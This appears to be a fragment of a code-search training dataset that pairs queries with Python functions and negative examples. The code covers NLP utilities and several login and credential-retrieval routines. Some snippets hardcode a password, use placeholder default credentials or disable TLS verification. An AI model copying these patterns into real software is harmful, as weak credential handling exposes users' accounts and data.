p, r, t in zip(Options, Priorities, Relevances, TargetNames):\n # if p == p0:\n # ogrp.append(o)\n # rgrp.append(r)\n # tgrp.append(t)\n # ogrp2 = []\n # rgrp2 = []\n # for t0 in TgtSet:\n # for o, r, t in zip(ogrp, rgrp, tgrp):\n # if t == t0:\n # ogrp2.append(\n\n Answer.append(\"$end\")\n return Answer",
"def overall_feeling(mood):\n \n # Quote and parting words of advice for students based on \n # what mood they have chosen to be currently feeling, from:\n # happy, sad, frustrated, bored, overwhelmed, hopeful, excited,\n # relaxed, hungry, and silly.\n mood_happy = (\" \\n *** 'Create the highest, grandest vision possible for\" +\n \" your life, because you become what you believe.'\" +\n \" -Oprah Winfrey. \\n Never take your happiness for\" +\n \" granted. :D U r pawsome! *** \\n \")\n mood_sad = (\" \\n *** 'There are only two ways to live your life. One is\" +\n \" as though nothing is a miracle. The other is as though\" +\n \" everything is a miracle.' -Albert Einstein \\n When I\" +\n \" am sad, I ask hooman to play fetch with me. However,\" +\n \" I don't think know how effective that is for you.\" +\n \" Sadness is really a tough one, there are just so many\" +\n \" angles to it... if only I could make you feel better\" +\n \" with just one quote. This too shall pass, my\" +\n \" fur-end! *** \\n \")\n mood_frustrated = (\" \\n *** 'If you can't fly, then run, if you can't\" +\n \" run, then walk, if you can't walk, then crawl,\" +\n \" but whatever you do, you have to keep moving\" \n \" forward.' -Martin Luther King Jr. \\n\" +\n \" Frustration is extremely stressful, but keep\" +\n \" going! No need to terrier-self up about it.\" +\n \" The end is near! Soon you will find peace of\" +\n \" mind. I'm rooting for you! *** \\n \")\n mood_bored = (\" \\n *** 'The time is always right to do what is right.'\" + \n \" -Martin Luther King Jr. \\n Go out and get some\" +\n \" fresh air! Or take this time to educate yourself\" +\n \" on current worldwide issues. This is a perfect\" +\n \" op-paw-tunity! There is no such thing as being\" +\n \" overeducated! :D *** \\n \")\n mood_overwhelmed = (\" \\n *** Believe you can and you're halfway there.'\" +\n \" -Theodore Roosevelt \\n Don't stress\" +\n \" yourself out, Puppy believes in you! You have\" +\n \" so much pet-tential! :D *** \\n \")\n mood_hopeful = (\" \\n *** ' All of our dreams can come true if we have\" +\n \" the courage to pursue them.' -Walt Disney \\n\" +\n \" Anything is paw-sible! :-) *** \\n \")\n mood_excited = (\" \\n *** 'You're only given a little spark of madness.\" +\n \" You mustn't lose it.' -Robin Williams \\n Looks like\" +\n \" fun things are happening in your life! Must be\" +\n \" having the ulti-mutt time of your life!! :D *** \\n \")\n mood_relaxed = (\" \\n *** 'Rest and be thankful.' -William Wadsworth \\n\" +\n \" Good for you! Hope you live long and paws-per! :)\" +\n \" *** \\n \")\n mood_hungry = (\" \\n *** I see that you're hungry. I am always hungry, but\" +\n \" my hooman only feeds me three times a day. How\" +\n \" prepawsterous! I hope you realize you are lucky to\" +\n \" have such long legs and arms to walk to the fridge\" +\n \" and grab yourself some food! Might I recommend\" +\n \" pup-eroni pizza...? *** \\n \")\n mood_silly = (\" \\n *** 'Why did the man fall into the well? He couldn't\" +\n \" see that well!' \\n If you're feeling silly, you\" +\n \" probably like puns. Hope you got a good chuckle out\" +\n \" of that one! I thought it was howlarious! :D *** \\n \")\n \n # Based on what mood the student feels, will return the corresponding\n # statement through if statements.\n if mood == 'happy':\n return(mood_happy)\n elif mood == 'sad':\n return(mood_sad)\n elif mood == 'frustrated':\n return(mood_sad)\n elif mood == 'bored':\n return(mood_bored)\n elif mood == 'overwhelmed':\n return(mood_overwhelmed)\n elif mood == 'hopeful':\n return(mood_hopeful)\n elif mood == 'excited':\n return(mood_excited)\n elif mood == 'relaxed':\n return(mood_relaxed)\n elif mood == 'hungry':\n return(mood_hungry)\n elif mood == 'silly':\n return(mood_silly)",
"def normalize(paraphrase):\n paraphrase = paraphrase.replace('[w1]', 'something').replace('[w2]', 'Thing') # For better parsing\n paraphrase_tokens = [t for t in nlp(paraphrase)]\n\n # Remove the NOUN/ADJ/DET in: [w2] ADP NOUN/ADJ/DET [w1]\n if paraphrase_tokens[-1].orth_ == 'something' and \\\n (paraphrase_tokens[-2].pos in set([NOUN, ADJ, DET]) or paraphrase_tokens[-2].orth_ == 'her'):\n paraphrase_tokens = paraphrase_tokens[:-2] + [paraphrase_tokens[-1]]\n\n # Remove adjectives and adverbs, and specific determiners (but not which, that)\n paraphrase_tokens = [t for t in paraphrase_tokens\n if t.pos not in tags_to_remove and \\\n t.orth_ not in modals and \\\n (t.pos != DET or t.orth_ in good_determiners)]\n\n # Named entities (e.g. \"price of rice in India\")\n if any([t.pos == PROPN for t in paraphrase_tokens]):\n return None\n\n # Replace past tense be verbs\n paraphrase_words = [t.orth_ if t.orth_ not in be_inflections else 'is'\n for t in paraphrase_tokens]\n\n # Last word is \"who\"\n if paraphrase_words[-1] == 'who':\n paraphrase_words = paraphrase_words[:-1]\n\n paraphrase = ' '.join(paraphrase_words).replace('something', '[w1]').replace('Thing', '[w2]')\n\n # Out-of-context\n if paraphrase == '[w2] is [w1]' or paraphrase == '[w2] as [w1]':\n return None\n\n if len(paraphrase) >= 2 and '[w2] [w1]' not in paraphrase:\n return paraphrase\n\n return None",
"def hat_rules(self, prob_function, args = [], labels = {}):\n\t\t#maybe change this to variable number of args with *args\n\t\t# Create nodes for all positions between words\n\t\troot_span = (0,self.lengthS)\n\t\tself.root_label = labels.get(root_span,None)\n\t\tnodes = [Node(i) for i in xrange(0, self.lengthS + 1)]\n\t\tspans = []\n\t\t\n\t\t# Construct the graph by creating the edges\n\t\tfor (i,j) in self.spans():\n\t\t\tnodes[j].link_to(nodes[i])\n\t\t\tspans.append((i,j))\n\t\tfor (i,j) in spans:\n\t\t\tfor path in nodes[i].shortest_paths_to(nodes[j]):\n\t\t\t\tif not path or len(path) == 2:\n\t\t\t\t\t# No rule possible, or path points to itself\n\t\t\t\t\tcontinue\n\t\t\t\trule = Rule((i,j),path, labels)\n\t\t\t\t# set probability\n\t\t\t\tprob = prob_function(rule,args)\n\t\t\t\tyield self.prune_production(rule, self.lex_dict)",
"def find_cooking_methods(steps, knowledge_base):\n verbiage = knowledge_base.cooking_terms\n method_list = []\n for step in steps:\n step = step.lower()\n for method in verbiage:\n if method in step and method not in method_list:\n step = step.replace(method, '')\n method_list.append(method)\n # print method_list\n return method_list",
"def test_joining_words_line_ending_evaluator(self):\n join_evaluator = JoiningWordLineEndingEvaluator()\n \n #comment with 2 lines that end in noun/verbs\n text = HaikuText(text=\"An old silent pond... A frog jumps into the pond. Splash! Silence again.\")\n haiku = text.get_haiku()\n #should score 66 \n self.assertEqual(join_evaluator(haiku), 100)\n\n # 2 good lines, one ending in is\n text.set_text(\"Application and the most wonderful artist that man can show us\")\n haiku = text.get_haiku()\n #should score 66\n self.assertEqual(join_evaluator(haiku), 2*100/3) \n \n #No verbs/nouns at line ends,\n text.set_text(\"They jumped right on in the boat is never sunk and that man can show of\")\n haiku = text.get_haiku()\n \n self.assertEqual(join_evaluator(haiku), 0)",
"def translation_paraphrase_evaluation(sources, hypos, refs, sentence_preproce_function=None, print_scores=True, max_n=4, rouge_alpha=0.5, rouge_weight_factor=1.2, rouge_stemming=True, hypo_style='first'):\n assert(isinstance(sources, list))\n assert(isinstance(sources[0], str))\n assert(isinstance(hypos, list))\n assert(isinstance(hypos[0], list))\n assert(isinstance(hypos[0][0], str))\n assert(isinstance(refs, list))\n assert(isinstance(refs[0], list))\n assert(isinstance(refs[0][0], str))\n \n if hypo_style == 'first':\n hypos = [hypo[0] for hypo in hypos]\n else:\n raise NotImplementedError\n\n # apply sentence_preproce_function, e.g. remove_tokens\n if sentence_preproce_function is not None:\n sources = [sentence_preproce_function(source) for source in sources]\n if hypo_style == 'first':\n hypos = [sentence_preproce_function(hypo) for hypo in hypos]\n else:\n raise NotImplementedError\n hypos = [[sentence_preproce_function(hypo) for hypo in hypo_list] for hypo_list in hypos]\n refs = [[sentence_preproce_function(ref) for ref in refs_list] for refs_list in refs]\n\n\n sources_refs = [[sentence] for sentence in sources] # we use source as the reference to compute a negative score, in order to measure the diversity of paraphrasing.\n metrics_dict = {}\n\n for aggregator in ['Avg', 'Best']:\n apply_avg = aggregator == 'Avg'\n apply_best = aggregator == 'Best'\n\n evaluator = rouge.Rouge(metrics=['rouge-n', 'rouge-l', 'rouge-w'],\n max_n=max_n,\n apply_avg=apply_avg,\n apply_best=apply_best,\n alpha=rouge_alpha, # Default F1_score\n weight_factor=rouge_weight_factor,\n stemming=rouge_stemming)\n \n compare_dict = {'hypos':hypos, 'sources':sources, 'sources_refs_diversity_negative': hypos}\n for key in compare_dict:\n if key == 'sources_refs_diversity_negative':\n scores = evaluator.get_scores(compare_dict[key], sources_refs)\n else:\n scores = evaluator.get_scores(compare_dict[key], refs)\n metrics_dict[key+'_rouge_'+aggregator] = scores\n\n if print_scores:\n print('Evaluation with {} with {}'.format(key, aggregator))\n for metric, results in sorted(scores.items(), key=lambda x: x[0]):\n if not apply_avg and not apply_best: # value is a type of list as we evaluate each summary vs each reference\n for hypothesis_id, results_per_ref in enumerate(results):\n nb_references = len(results_per_ref['p'])\n for reference_id in range(nb_references):\n print('\\tHypothesis #{} & Reference #{}: '.format(hypothesis_id, reference_id))\n print('\\t' + rouge_helper_prepare_results(metric,results_per_ref['p'][reference_id], results_per_ref['r'][reference_id], results_per_ref['f'][reference_id]))\n print()\n else:\n print(rouge_helper_prepare_results(metric, results['p'], results['r'], results['f']))\n print()\n\n bleu_sources = []\n for source in sources:\n bleu_sources.append(word_tokenize(source))\n bleu_hypos = []\n if hypo_style == 'first':\n for hypo in hypos:\n bleu_hypos.append(word_tokenize(hypo))\n else:\n raise NotImplementedError\n bleu_hypos = copy.deepcopy(hypos)\n for sub_hypo in bleu_hypos:\n for i in range(len(sub_hypo)):\n sub_hypo[i] = word_tokenize(sub_hypo[i])\n bleu_refs = copy.deepcopy(refs)\n for sub_ref in bleu_refs:\n for i in range(len(sub_ref)):\n sub_ref[i] = word_tokenize(sub_ref[i])\n for sources_ref in sources_refs:\n for i in range(len(sources_ref)):\n sources_ref[i] = word_tokenize(sources_ref[i])\n\n\n\n # print(corpus_bleu(bleu_refs, bleu_hypos, weights=(1, 0, 0, 0)))\n # return\n metrics_dict[\"bleu_1\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(1, 0, 0, 0))\n metrics_dict[\"bleu_2\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(0.5, 0.5, 0, 0))\n metrics_dict[\"bleu_3\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(0.33, 0.33, 0.34, 0))\n metrics_dict[\"bleu_4\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(0.25, 0.25, 0.25, 0.25))\n\n metrics_dict[\"source_sentence_bleu_1\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(1, 0, 0, 0))\n metrics_dict[\"source_sentence_bleu_2\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(0.5, 0.5, 0, 0))\n metrics_dict[\"source_sentence_bleu_3\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(0.33, 0.33, 0.34, 0))\n metrics_dict[\"source_sentence_bleu_4\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(0.25, 0.25, 0.25, 0.25))\n\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_1\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(1, 0, 0, 0))\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_2\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(0.5, 0.5, 0, 0))\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_3\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(0.33, 0.33, 0.34, 0))\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_4\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(0.25, 0.25, 0.25, 0.25))\n\n if print_scores:\n for sc in [\"bleu_1\", \"bleu_2\", \"bleu_3\", \"bleu_4\", \"source_sentence_bleu_1\", \"source_sentence_bleu_2\", \"source_sentence_bleu_3\", \"source_sentence_bleu_4\", \"sources_as_refs_diversity_negative_bleu_1\", \"sources_as_refs_diversity_negative_bleu_2\", \"sources_as_refs_diversity_negative_bleu_3\", \"sources_as_refs_diversity_negative_bleu_4\"]:\n print(sc,\"(percents):\", round(metrics_dict[sc], 4) * 100)\n\n return metrics_dict",
"def body_words_in_headline(self,doc):\n features = defaultdict(int)\n analyze = self.build_analyzer()\n headline_tokens=analyze(doc[0])\n body_tokens=analyze(doc[1])\n #headline_token_counts=defaultdict(int)\n body_token_counts=defaultdict(int)\n for token in body_tokens:\n body_token_counts[token]+=1\n for token in headline_tokens:\n if token in body_token_counts:\n features[token] +=1\n return features",
"def add_scores(self, hyp):\n # Collect up the phrase pairs\n phrases = []\n source_tokens = hyp.input_line.split()\n tgt_st = 0\n if not hyp.alignment:\n raise DataFormatException(\"Alignments missing from: \" + str(hyp))\n for src_st,src_end,tgt_end in hyp.alignment:\n phrases.append((source_tokens[src_st:src_end], hyp.tokens[tgt_st:tgt_end]))\n tgt_st = tgt_end\n # Look up the scores\n phrase_scores = []\n for ttable in self.ttables:\n phrase_scores.append([])\n for phrase in phrases:\n phrase_scores[-1].append(ttable.get_scores(phrase))\n# phrase_scores = np.array(phrase_scores)\n# eps = np.exp(-100)\n# phrase_scores[phrase_scores<eps]=eps\n floor = np.exp(-100)\n phrase_scores = np.clip(np.array(phrase_scores), floor, np.inf)\n hyp.phrase_scores = phrase_scores",
"def apply_nlp(category):\n if \" \" in category:\n if \" for \" in category:\n idx = category.find(\" for \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 5 :])\n return [suffix, prefix, *apply_nlp(suffix), *apply_nlp(prefix)]\n elif \"(\" in category:\n start = category.find(\"(\")\n end = category.find(\")\")\n outer = strip_article(category[:start] + \" \" + category[end + 1 :])\n inner = strip_article(category[start + 1 : end])\n return [outer, inner, *apply_nlp(outer), *apply_nlp(inner)]\n elif \" with \" in category:\n idx = category.find(\" with \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 6 :])\n return [prefix, suffix, *apply_nlp(prefix), *apply_nlp(suffix)]\n elif \" of \" in category:\n idx = category.find(\" of \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 4 :])\n if prefix in [\"pair\", \"copy\", \"base\", \"fragments\", \"figure\", \"copy\"]:\n return [suffix, *apply_nlp(suffix)]\n else:\n return [suffix, prefix, *apply_nlp(suffix), *apply_nlp(prefix)]\n elif \" from \" in category:\n idx = category.find(\" from \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 4 :])\n if prefix in [\"pair\", \"copy\", \"base\", \"fragments\", \"figure\", \"copy\"]:\n return [suffix, *apply_nlp(suffix)]\n else:\n return [suffix, prefix, *apply_nlp(suffix), *apply_nlp(prefix)]\n elif \"&\" in category:\n categories = [strip_article(c) for c in category.split(\"&\")]\n for cat in list(categories):\n categories = categories + apply_nlp(cat)\n return categories\n elif \" and \" in category or \",\" in category:\n categories = []\n while \" and \" in category or \",\" in category:\n and_idx = category.find(\" and \")\n comma_idx = category.find(\",\")\n if and_idx >= 0 and comma_idx >= 0:\n idx = min(and_idx, comma_idx)\n elif and_idx >= 0:\n idx = and_idx\n elif comma_idx >= 0:\n idx = comma_idx\n else:\n idx = -1\n if idx >= 0:\n categories.append(strip_article(category[:idx]))\n if category[idx] == \",\":\n category = category[idx + 1 :]\n else:\n category = category[idx + 5 :]\n if category.strip().strip(\"()[]\"):\n categories.append(strip_article(category.strip().strip(\"()[]\")))\n for cat in list(categories):\n categories = categories + apply_nlp(cat)\n return categories\n elif \" or \" in category:\n categories = []\n while \" or \" in category:\n idx = category.find(\" or \")\n if idx >= 0:\n categories.append(strip_article(category[:idx]))\n category = category[idx + 4 :].strip().strip(\"()[]\")\n if category.strip().strip(\"()[]\"):\n categories.append(strip_article(category))\n for cat in list(categories):\n categories = categories + apply_nlp(cat)\n return categories\n else:\n categories = category.split()\n return [\" \".join(categories[-idx:]) for idx in range(len(categories) - 1, 0, -1)]\n else:\n return []",
"def generate_hairstyle(hairstyle_attributes, is_male):\n\n hair_type = {\"Bald\", \"Straight_Hair\", \"Wavy_Hair\", \"Receding_Hairline\"}\n\n # To create grammatically correct order of description\n arranged_attributes = []\n colours = list(set(hairstyle_attributes) - hair_type)\n if len(colours) > 1:\n # Combines two colours into one attribute\n colour = \"\"\n for i, _colour in enumerate(colours):\n if i == 0:\n _colour = _colour.lower().split(\"_\")[0] + \"ish\"\n _colour = _colour.lower().split(\"_\")[0]\n colour += _colour + \" \"\n arranged_attributes.append(\n colour.strip()\n ) # Strip to remove trailing whitespace\n elif len(colours) == 1:\n colour = colours[0].lower().split(\"_\")[0]\n arranged_attributes.append(colour)\n style = set(hairstyle_attributes) & {\"Straight_Hair\", \"Wavy_Hair\"}\n arranged_attributes.extend(list(style))\n bald_rec = set(hairstyle_attributes) & {\"Receding_Hairline\", \"Bald\"}\n arranged_attributes.extend(list(bald_rec))\n\n if len(arranged_attributes) == 1:\n attribute = arranged_attributes[0].lower().split(\"_\")[0]\n if attribute == \"bald\":\n return \"He is bald.\" if is_male else \"She is bald.\"\n if random.random() <= 0.5:\n sentence = \"His\" if is_male else \"Her\"\n return sentence + \" hair is \" + attribute + \".\"\n else:\n sentence = \"He\" if is_male else \"She\"\n return sentence + \" has \" + attribute + \" hair.\"\n\n # Adding variation in sentence structure\n if random.random() <= 0.5:\n sentence = \"His\" if is_male else \"Her\"\n sentence += \" hair is\"\n for i, attribute in enumerate(arranged_attributes):\n attribute = attribute.lower().split(\"_\")[0]\n if len(arranged_attributes) - 1 == i:\n sentence = sentence[:-1]\n if attribute == \"bald\":\n attribute = \"he\" if is_male else \"she\"\n attribute += (\n \" is \" + random.choice([\"going\", \"partially\"]) + \" bald\"\n )\n return sentence + \" and \" + attribute + \".\"\n return sentence + \" and \" + attribute + \".\"\n sentence += \" \" + attribute + \",\"\n else:\n sentence = \"He\" if is_male else \"She\"\n sentence += \" has\"\n for i, attribute in enumerate(arranged_attributes):\n attribute = attribute.lower().split(\"_\")[0]\n if len(arranged_attributes) - 1 == i:\n sentence = sentence[:-1]\n if attribute == \"bald\":\n sentence += \" hair\"\n attribute = \"he\" if is_male else \"she\"\n attribute += (\n \" is \" + random.choice([\"going\", \"partially\"]) + \" bald\"\n )\n return sentence + \" and \" + attribute + \".\"\n return sentence + \" and \" + attribute + \" hair.\"\n sentence += \" \" + attribute + \",\"",
"def generateWHQuestion(self, sentence):\n # sentence = sentence.lower()\n question = ''; # question\n WHVerbs = ['Who', 'What', 'Where']; # wh verb list\n # p = PreProcess()\n # wordDic = {'But':'','Similarly':'','Thus':'','Therefore,':''}\n wordDic = {'Thus, ': '', 'Hence, ': '', 'Hence ': '', 'Therefore,': '', 'But,': '', 'But': '', 'Similarly': '',\n 'Therefore': ''} # word dictionary of conjunctions\n p = PreProcess()\n sentence = p.multipleReplace(sentence,\n wordDic) # replacing conjunctions in word dictionary if found in sentence\n helper = QuestionFormationHelper()\n # if nltk.word_tokenize(sentence)[0].find(\"But\") != -1 or nltk.word_tokenize(sentence)[0].find(\"Therefore\") != -1 or nltk.word_tokenize(sentence)[0].find(\"Similarly\") != -1 or nltk.word_tokenize(sentence)[0].find(\"Thus\") != -1:\n # sentence = p.multipleReplace(sentence,wordDic)\n sentence = helper.removingFirstDt(sentence) # removing the first determiner\n subject = helper.getSubject(sentence); # identifying the subject of the sentence\n\n if subject == 'SUBJECT CANNOT BE DEFINED' or subject == 'none':\n question = '';\n else:\n label = helper.getLabelArray(subject); # identifying the named entity label for the subject\n\n if label == '':\n # wordDict = {'%subject%': 'What '}\n # p = PreProcess()\n # question = p.multipleReplace(sentence,wordDict)\n # print(\"SUBJECT : \" + subject.lstrip())\n # when there is no particular label the question will be what type\n # print(\"SUBJECT::::::::::: \" + subject.lstrip())\n question = str(sentence).replace(subject.lstrip(), \"What \", 1);\n question = question + ' ?'\n # print(question)\n # question = question.replace(\".\", \"?\");\n # print(question)\n # when the named entity label is person the question will be who type\n elif label == 'PERSON':\n question = sentence.replace(subject, \"Who \", 1);\n question = question + ' ?'\n # when the named entity label is location the question will be where type\n elif label == 'LOCATION':\n question = sentence.replace(subject, \"Where \", 1);\n question = question + ' ?'\n\n\n if question is '':\n # question = \"CANNOT GENERATE MEANINGFUL WH TYPE QUESTION\";\n return '';\n elif nltk.word_tokenize(question)[0] not in WHVerbs:\n # question = \"CANNOT GENERATE MEANINGFUL WH TYPE QUESTION\";\n return '';\n else:\n return question"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Go to vault, get our login credentials and return a dict properly formatted for authenticating with the web site.
|
def get_login_credentials():
hvac_client = get_hvac_client()
login_credentials = hvac_client.secrets.kv.v1.read_secret(
VAULT_SECRETS_PATH
)
return login_credentials["data"]
|
[
"def authenticate():\n\n if settings.user_login == 'read_only':\n log.error('Write access denied for read_only user.')\n sys.exit(1)\n else:\n log.info('Authenticating login: %s' % (settings.user_login))\n if settings.user_login == 'kaboom':\n password = 'password'\n elif settings.user_login == 'hvm':\n password = settings.hvm_password\n else:\n password = getpass.getpass('password: ')\n\n try:\n payload = {'form.submitted': True,\n 'api.client': True,\n 'return_url': '/api',\n 'login': settings.user_login,\n 'password': password\n }\n r = session.post(settings.api_protocol\n + '://'\n + settings.api_host\n + '/login', data=payload)\n\n if r.status_code == requests.codes.ok:\n\n cookies = session.cookies.get_dict()\n log.debug('Cookies are: %s' %(cookies))\n try:\n write_cookie(cookies)\n return cookies\n except Exception, e:\n log.error('Exception: %s' % e)\n\n else:\n log.error('Authentication failed')\n sys.exit(1)\n\n except Exception, e:\n log.error('Exception: %s' % e)\n log.error('Authentication failed')\n sys.exit(1)",
"def list_vaults():\n return json.loads(read_bash_return(\"op vault list --format=json\", single=False))",
"def get_login():\n return {\n 'server': os.environ.get(\"DERPY_SERVER\",\n \"https://crawl.kelbi.org/#lobby\"),\n 'username': os.environ.get(\"DERPY_USERNAME\", \"username\"),\n 'password': os.environ.get(\"DERPY_PASSWORD\", \"password\"),\n }",
"def _get_ansible_vault_password_and_record(self):\n self._get_vault_variables_and_record()\n return self._get_ansible_vault_password()",
"def _load_secrets_from_vault(\n password: str,\n vault_file: str\n) -> Dict[str, Union[str, Dict[str, str]]]:\n with py7zr.SevenZipFile(vault_file, mode='r', password=password) as f:\n archive = f.readall()\n d = json.load(archive['secrets.json'])\n return d",
"def login_to_bovada():\n\tquery_1 = query_login_endpoint() #query the login endpoint like we would if using a browser\n\tif query_1.status_code == 200:\n\t\tauthenticated_ourselves = bovada_auth()\n\t\tif authenticated_ourselves.status_code == 200:\n\t\t\treturn authenticated_ourselves\n\t\telse:\n\t\t\traise BovadaAuthenticationError(authenticated_ourselves.reason)\n\telse:\n\t\traise BovadaException(query_1.reason)",
"def read_from_vault(self, path_to_read, vault_client):\n self.logger.debug(\"Reading kv tree\")\n kv_full = {}\n kv_list = vault_client.secrets_tree_list(\n path_to_read\n )\n self.logger.debug(\"Secrets found: \" + str(kv_list))\n for kv in kv_list:\n kv_full[kv] = vault_client.read_secret(kv)\n return kv_full",
"def towerLogin(self, url, username, password):\n global PROXY_DICT\n login_data = (str(username), str(password))\n login_header = {'Content-Type': 'application/json'}\n try:\n response = requests.post(url, auth=login_data,\n headers=login_header, verify=False,\n timeout=5, proxies=PROXY_DICT)\n if response.status_code != 201:\n self.logger.warn('Tower Login failed...'\n '\\nStatus Code{0} - {1}'\n ''.format(response.status_code,\n response.text))\n exit(-1)\n else:\n return response.json()['token']\n except requests.exceptions.ConnectTimeout:\n self.logger.warning('ERROR: Error connecting to '\n 'Ansible host: connection attempt timed out.')\n exit(-1)",
"def read_from_vault(self, path_to_read):\n self.logger.debug(\"Reading kv tree\")\n vault_client = VaultClient(\n self.base_logger,\n dry=self.parsed_args.dry_run,\n skip_tls=self.parsed_args.skip_tls\n )\n vault_client.authenticate()\n kv_full = {}\n kv_list = vault_client.get_secrets_tree(\n path_to_read\n )\n self.logger.debug(\"Secrets found: \" + str(kv_list))\n for kv in kv_list:\n kv_full[kv] = vault_client.read_secret(kv)\n return kv_full",
"def serverReadAuthCreds(conn:socket.socket) ->tuple:\n version, ulen = struct.unpack(\"BB\", __class__.recv2(conn, 2, socket.MSG_WAITALL))\n username = __class__.recv2(conn, ulen, socket.MSG_WAITALL)\n plen = ord(__class__.recv2(conn, 1))\n password = __class__.recv2(conn, plen, socket.MSG_WAITALL)\n return (version, username.decode(\"utf-8\"), password.decode(\"utf-8\"))",
"def auth(self):\n return (self.username, self.password)",
"def extractCredentials(self, request):\n creds = {}\n getHeader = getattr(request, 'getHeader', None)\n if getHeader is None:\n # use get_header instead for Zope-2.8\n getHeader = request.get_header\n user_id = getHeader('REMOTE_USER')\n if user_id is not None:\n creds['machine_login'] = user_id\n creds['remote_host'] = request.get('REMOTE_HOST', '')\n try:\n creds['remote_address'] = request.getClientAddr()\n except AttributeError:\n creds['remote_address'] = request.get('REMOTE_ADDR', '')\n return creds\n else:\n # fallback to default way\n return DumbHTTPExtractor().extractCredentials(request)",
"def extractCredentials(self, request):\n creds={}\n identity=request.form.get(\"__ac_identity_url\", \"\").strip()\n if identity != \"\":\n self.initiateChallenge(identity)\n return creds\n\n self.extractOpenIdServerResponse(request, creds)\n return creds",
"def get_login_info(self):\n username = raw_input(\"Username: \")\n password = getpass.getpass(\"Password:\")\n return (username, password)",
"def _get_credentials(self):\n cred = {\n 'username': self.username,\n 'password': self.password,\n 'host': self.host,\n 'port': self.port,\n }\n return cred",
"def _get_auth_tokens(self):\n _LOGGER.info(\"Retrieving tp-link auth tokens...\")\n\n url_login = 'http://{}/'.format(self.host)\n Y_passwd = '{}'.format(self.password)\n En_passwd = Encrypt(passwd=Y_passwd).encrypt_passwd()\n post_data = {'login': {'password': En_passwd}, 'method': 'do'}\n get_Text = requests.post(url=url_login, json=post_data).text\n get_data = json.loads(get_Text)\n\n if 'stok' not in get_data.keys():\n _LOGGER.error(\"路由器登陆失败,很肯能密码错误\")\n else:\n self.stok = get_data['stok']",
"def authenticate(self):\n logging.info(\"User ID: %s.\", self.user_id)\n\n logging.info(\"Loading game page on VK.com…\")\n app_page = self.session.get(\n \"https://vk.com/app3644106_{}\".format(self.user_id), cookies=self.cookies, timeout=15).text\n\n # Look for params variable in the script.\n match = re.search(r\"var params\\s?=\\s?(\\{[^\\}]+\\})\", app_page)\n if not match:\n raise ValueError(\"params not found\")\n params = json.loads(match.group(1))\n logging.debug(\"Found params: %s\", params)\n\n # Load the proxy page and look for Epic War authentication token.\n logging.info(\"Authenticating in Epic War…\")\n iframe_new = self.session.get(\n \"https://i-epicwar-vk.progrestar.net/iframe/vkontakte/iframe.new.php\",\n params=params,\n timeout=10,\n ).text\n match = re.search(r\"auth_key=([a-zA-Z0-9.\\-]+)\", iframe_new)\n if not match:\n raise ValueError(\"authentication key is not found: %s\" % iframe_new)\n self.auth_token = match.group(1)\n logging.debug(\"Authentication token: %s\", self.auth_token)",
"def login(self):\n\n formdata = {\"username\": self.username, \"password\": self.password}\n r = requests.get(os.path.join(self.toon_url, 'login'), params=formdata)\n self.sessiondata = r.json()",
"def get_credentials():\n username = os.environ.get('USER')\n password = os.environ.get('URS_PWORD')\n # Most machines do set USER, but URS_PWORD is suitably obscure\n if username is None or password is None:\n username = input(\"URS Username: \")\n password = getpass.getpass(\"URS Password: \")\n\n return username, password",
"def extractCredentials( self, request ):\n if not request._auth or not request._auth.startswith(self.auth_scheme):\n return None\n \n ticket = request._auth[len(self.auth_scheme)+1:]\n\n creds = {}\n creds['ticket'] = ticket\n creds['plugin'] = self.getId()\n\n return creds"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Handles the event that a new rte list has been published. If there is a rte with type 'unknown', further processing is canceled as the rte monitor does not deliver usable values yet
|
def __delegate_rte_list_received(self, rte_list):
received_rte_list = list(rte_list.runtimeEvidences)
# rte monitor cannot provide usable values, yet.
if any((rte.type == 'unknown' or rte.type == 'omission') for rte in received_rte_list):
if debug_mode:
rospy.loginfo('There is a rte with an unknown type.')
return
runtime_evidences_are_equal = self.received_rte_are_equal(received_rte_list)
if not runtime_evidences_are_equal:
# update current rte list
self.__current_runtime_evidences = received_rte_list
# delay message publishing
# --> assure that the vehicle icons are updated in the CARLA client before the simulation is paused
# (without also updating the timegap setpoint before the Consert Tree in the unity component is evaluated)
# --> assure that the unity component animation is delayed, so that the animation starts at the same time the simulation gets paused
sleep(0.25)
# publish topic to pause simulation
#rospy.loginfo('ChangedSimulationState is set to false')
changed_simulation_state = ChangedSimulationState()
changed_simulation_state.simulationIsRunning = False
self.__change_simulation_state_publisher.publish(changed_simulation_state)
# publish topic with updated rte list
updated_rte_list = RtEList()
#rospy.loginfo('Updated rte list is published')
updated_rte_list.runtimeEvidences = tuple(self.__current_runtime_evidences)
self.__updated_runtime_evidence_list_publisher.publish(updated_rte_list)
|
[
"async def checkNew(self):\n if self.source:\n items = self.source.getRecent()\n items.reverse()\n if items:\n for item in items:\n if item.title not in self.cache:\n logger.info(f'New entry from {str(self.source)}: {item.title}')\n self.cache.append(item.title)\n for itemList in self.list:\n if item.title == itemList['title'] or item.title == itemList['title_english']:\n if itemList['mal_id'] not in self.ignore:\n await self.sendPing(item.title, item.progress, item.link, itemList['image_url'])\n else:\n logger.error(f'Failed retrieving from {str(self.source)}')\n else:\n logger.error(\"Cannot check for new entries, source is not set\")",
"def notify(self, nlist: 'SoNotList') -> \"void\":\n return _coin.SoField_notify(self, nlist)",
